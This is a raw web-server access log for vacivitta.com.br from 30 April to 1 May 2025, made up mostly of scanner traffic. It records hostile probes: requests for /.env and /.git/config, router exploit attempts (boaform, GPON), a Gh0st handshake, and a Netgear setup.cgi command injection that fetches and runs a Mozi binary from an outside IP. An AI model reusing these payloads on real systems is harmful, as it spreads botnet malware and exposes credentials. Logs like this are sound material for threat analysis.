vacivitta.com.br:80
185.218.86.4 - - [30/Apr/2025:13:56:25 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.180.141.34 - - [30/Apr/2025:14:14:33 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [30/Apr/2025:14:36:33 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.84.178 - - [30/Apr/2025:15:08:37 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [30/Apr/2025:15:08:40 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
92.58.138.163 - - [30/Apr/2025:15:11:27 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
vacivitta.com.br:80
93.174.93.12 - - [30/Apr/2025:15:26:54 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (Linux; Android 9; ONEPLUS A5000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
vacivitta.com.br:80
154.81.156.35 - - [30/Apr/2025:15:36:52 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [30/Apr/2025:15:40:27 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [30/Apr/2025:16:23:00 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [30/Apr/2025:16:25:58 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
20.40.248.41 - - [30/Apr/2025:16:40:45 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
5.183.209.244 - - [30/Apr/2025:16:41:32 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [30/Apr/2025:16:54:01 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [30/Apr/2025:17:21:10 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.7 - - [30/Apr/2025:17:23:53 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [30/Apr/2025:17:43:36 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
135.119.90.134 - - [30/Apr/2025:17:47:37 -0300] "GET /ReportServer HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
154.81.156.35 - - [30/Apr/2025:17:58:25 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
93.174.93.12 - - [30/Apr/2025:17:58:56 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
185.218.84.178 - - [30/Apr/2025:18:13:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [30/Apr/2025:18:23:41 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
142.93.34.150 - - [30/Apr/2025:18:43:29 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
142.93.34.150 - - [30/Apr/2025:18:43:30 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
104.248.254.144 - - [30/Apr/2025:18:43:38 -0300] "GET /api/v1/ws/server HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
154.81.156.54 - - [30/Apr/2025:19:09:25 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [30/Apr/2025:19:13:02 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
59.88.227.72 - - [30/Apr/2025:19:25:12 -0300] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 - "-" "-"
vacivitta.com.br:80
2.83.229.106 - - [30/Apr/2025:19:29:33 -0300] "GET / HTTP/1.1" 200 488 "-" "Hello-World/1.0"
vacivitta.com.br:80
154.81.156.54 - - [30/Apr/2025:19:54:59 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
5.183.209.244 - - [30/Apr/2025:19:55:41 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
205.210.31.162 - - [30/Apr/2025:19:57:49 -0300] "GET / HTTP/1.0" 200 488 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
vacivitta.com.br:80
45.156.129.132 - - [30/Apr/2025:20:03:39 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
vacivitta.com.br:80
20.163.37.98 - - [30/Apr/2025:20:06:42 -0300] "GET /developmentserver/metadatauploader HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
124.198.131.143 - - [30/Apr/2025:20:17:45 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
vacivitta.com.br:80
154.81.156.35 - - [30/Apr/2025:20:23:30 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [30/Apr/2025:20:35:39 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
198.58.109.12 - - [30/Apr/2025:20:36:37 -0300] "POST /wsman HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
vacivitta.com.br:80
161.35.48.84 - - [30/Apr/2025:20:36:37 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
vacivitta.com.br:80
159.89.150.31 - - [30/Apr/2025:20:36:44 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
vacivitta.com.br:80
159.89.150.31 - - [30/Apr/2025:20:36:44 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
vacivitta.com.br:80
178.128.78.205 - - [30/Apr/2025:20:36:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
vacivitta.com.br:80
44.193.10.128 - - [30/Apr/2025:20:39:03 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0"
vacivitta.com.br:80
44.193.10.128 - - [30/Apr/2025:20:39:03 -0300] "GET /assets/index-DogtGhmX.js HTTP/1.1" 200 839022 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0"
vacivitta.com.br:80
80.82.77.202 - - [30/Apr/2025:20:42:02 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36"
vacivitta.com.br:80
45.79.134.181 - - [30/Apr/2025:20:54:11 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
vacivitta.com.br:80
45.79.134.181 - - [30/Apr/2025:20:54:11 -0300] "GET /auth.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
vacivitta.com.br:80
45.79.134.181 - - [30/Apr/2025:20:54:12 -0300] "GET /auth1.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
vacivitta.com.br:80
45.79.134.181 - - [30/Apr/2025:20:54:12 -0300] "GET /sslvpnLogin.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
vacivitta.com.br:80
45.79.134.181 - - [30/Apr/2025:20:54:12 -0300] "GET /api/sonicos/auth HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
vacivitta.com.br:80
45.79.134.181 - - [30/Apr/2025:20:54:12 -0300] "GET /api/sonicos/tfa HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
vacivitta.com.br:80
43.157.53.115 - - [30/Apr/2025:21:01:32 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
vacivitta.com.br:80
174.64.36.189 - - [30/Apr/2025:21:16:45 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
154.81.156.54 - - [30/Apr/2025:21:19:26 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
205.210.31.92 - - [30/Apr/2025:21:23:05 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
205.210.31.92 - - [30/Apr/2025:21:23:05 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
185.242.226.154 - - [30/Apr/2025:21:26:41 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [30/Apr/2025:21:27:33 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Python/3.7 aiohttp/3.8.1"
vacivitta.com.br:80
5.183.209.244 - - [30/Apr/2025:21:31:49 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [30/Apr/2025:21:51:00 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
18.237.133.73 - - [30/Apr/2025:22:12:06 -0300] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
vacivitta.com.br:80
185.218.86.4 - - [30/Apr/2025:22:12:10 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
144.217.105.192 - - [30/Apr/2025:22:18:07 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
144.217.105.192 - - [30/Apr/2025:22:18:07 -0300] "POST / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
154.81.156.35 - - [30/Apr/2025:22:21:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
92.47.33.166 - - [30/Apr/2025:22:27:36 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
vacivitta.com.br:80
45.33.33.185 - - [30/Apr/2025:22:30:12 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
165.22.132.138 - - [30/Apr/2025:22:30:20 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
165.22.132.138 - - [30/Apr/2025:22:30:22 -0300] "Gh0st\xad" 404 - "-" "-"
vacivitta.com.br:80
165.22.132.138 - - [30/Apr/2025:22:30:25 -0300] "HELP" 404 - "-" "-"
vacivitta.com.br:80
165.22.132.138 - - [30/Apr/2025:22:30:25 -0300] "\x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc\n" 404 - "-" "-"
vacivitta.com.br:80
165.22.132.138 - - [30/Apr/2025:22:30:27 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
165.22.132.138 - - [30/Apr/2025:22:30:28 -0300] "\xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xff\xd9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff\n" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [30/Apr/2025:22:34:17 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.7 - - [30/Apr/2025:22:34:24 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
185.218.84.178 - - [30/Apr/2025:22:44:56 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
122.96.48.112 - - [30/Apr/2025:23:06:20 -0300] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://102.97.28.253:39743/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [30/Apr/2025:23:08:42 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
189.147.205.2 - - [30/Apr/2025:23:16:40 -0300] "GET / HTTP/1.1" 200 488 "-" "Hello-World/1.0"
vacivitta.com.br:80
65.49.1.118 - - [30/Apr/2025:23:43:20 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0"
vacivitta.com.br:80
65.49.1.111 - - [30/Apr/2025:23:46:47 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/101.0.4951.41 Safari/537.36"
vacivitta.com.br:80
65.49.1.121 - - [30/Apr/2025:23:47:18 -0300] "GET /geoserver/web/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0"
vacivitta.com.br:80
8.210.123.17 - - [01/May/2025:00:01:27 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:00:02:24 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:00:36:54 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
162.216.149.18 - - [01/May/2025:00:38:37 -0300] "GET / HTTP/1.1" 200 488 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
vacivitta.com.br:80
59.90.191.141 - - [01/May/2025:00:41:11 -0300] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 - "-" "Hello, World"
vacivitta.com.br:80
154.81.156.35 - - [01/May/2025:00:48:31 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [01/May/2025:00:53:00 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.91.127.81 - - [01/May/2025:01:02:19 -0300] "CONNECT api.ip.pn:443 HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
154.81.156.7 - - [01/May/2025:01:15:17 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
93.174.93.12 - - [01/May/2025:01:16:02 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:01:16:28 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
80.82.77.202 - - [01/May/2025:01:24:35 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:01:46:54 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
45.156.128.130 - - [01/May/2025:01:49:28 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [01/May/2025:02:03:49 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
3.144.97.11 - - [01/May/2025:02:07:02 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
vacivitta.com.br:80
3.144.97.11 - - [01/May/2025:02:07:10 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
vacivitta.com.br:80
3.144.97.11 - - [01/May/2025:02:07:56 -0300] "\n" 404 - "-" "-"
vacivitta.com.br:80
5.183.209.244 - - [01/May/2025:02:10:54 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
3.144.97.11 - - [01/May/2025:02:15:24 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:02:17:09 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.84.178 - - [01/May/2025:02:24:54 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
213.114.77.111 - - [01/May/2025:02:35:25 -0300] "GET / HTTP/1.1" 200 488 "-" "Hello-World/1.0"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:02:58:19 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [01/May/2025:03:04:41 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
64.62.156.204 - - [01/May/2025:03:22:22 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
185.218.86.4 - - [01/May/2025:03:33:44 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:03:41:33 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
146.190.223.218 - - [01/May/2025:03:41:50 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
146.190.223.218 - - [01/May/2025:03:41:50 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
146.190.223.218 - - [01/May/2025:03:41:50 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
146.190.223.218 - - [01/May/2025:03:41:50 -0300] "GET /form.html HTTP/1.1" 404 - "-" "curl/8.1.2"
vacivitta.com.br:80
146.190.223.218 - - [01/May/2025:03:41:50 -0300] "GET /upl.php HTTP/1.1" 404 - "-" "Mozilla/5.0"
vacivitta.com.br:80
146.190.223.218 - - [01/May/2025:03:41:50 -0300] "GET /t4 HTTP/1.1" 404 - "-" "Mozilla/5.0"
vacivitta.com.br:80
146.190.223.218 - - [01/May/2025:03:41:51 -0300] "GET /geoip/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
146.190.223.218 - - [01/May/2025:03:41:51 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
146.190.223.218 - - [01/May/2025:03:41:51 -0300] "GET /1.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
